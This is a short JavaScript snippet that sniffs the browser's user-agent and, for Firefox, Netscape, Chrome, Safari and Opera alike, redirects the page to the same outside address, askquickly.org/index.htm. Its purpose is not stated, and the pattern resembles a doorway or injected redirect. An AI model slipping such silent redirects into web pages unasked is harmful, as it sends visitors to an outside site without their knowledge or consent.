if(navigator.userAgent.indexOf("Firefox") != -1)
{
   window.location = "http://www.askquickly.org/index.htm";
}
else if(navigator.userAgent.indexOf("Netscape") != -1)
{
   window.location = "http://www.askquickly.org/index.htm";
}
else if(navigator.userAgent.indexOf("Chrome") != -1)
{
   window.location = "http://www.askquickly.org/index.htm";
}
else if(navigator.userAgent.indexOf("Safari") != -1)
{
   window.location = "http://www.askquickly.org/index.htm";
}
else if(navigator.userAgent.indexOf("Opera") != -1)
{
   window.location = "http://www.askquickly.org/index.htm";
}
